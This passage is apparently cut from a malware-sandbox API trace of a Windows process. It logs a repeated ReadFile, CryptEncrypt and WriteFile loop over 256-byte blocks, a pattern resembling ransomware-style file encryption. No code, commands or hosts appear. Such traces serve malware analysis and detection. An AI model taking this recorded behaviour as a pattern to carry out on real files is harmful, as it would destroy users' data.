lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.861] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.861] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.861] GetLastError () returned 0x0 [0166.861] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.862] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.862] GetLastError () returned 0x0 [0166.862] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.862] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.863] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.863] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.863] GetLastError () returned 0x0 [0166.863] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.864] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.864] GetLastError () returned 0x0 [0166.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.864] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.864] GetLastError () returned 0x0 [0166.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.864] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.864] GetLastError () returned 0x0 [0166.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.864] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.864] GetLastError () returned 0x0 [0166.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.864] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.864] GetLastError () returned 0x0 [0166.864] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.864] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.865] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.865] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.865] GetLastError () returned 0x0 [0166.865] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.866] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.866] GetLastError () returned 0x0 [0166.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882cb0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.866] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.866] GetLastError () returned 0x0 [0166.866] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.866] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882cb0, 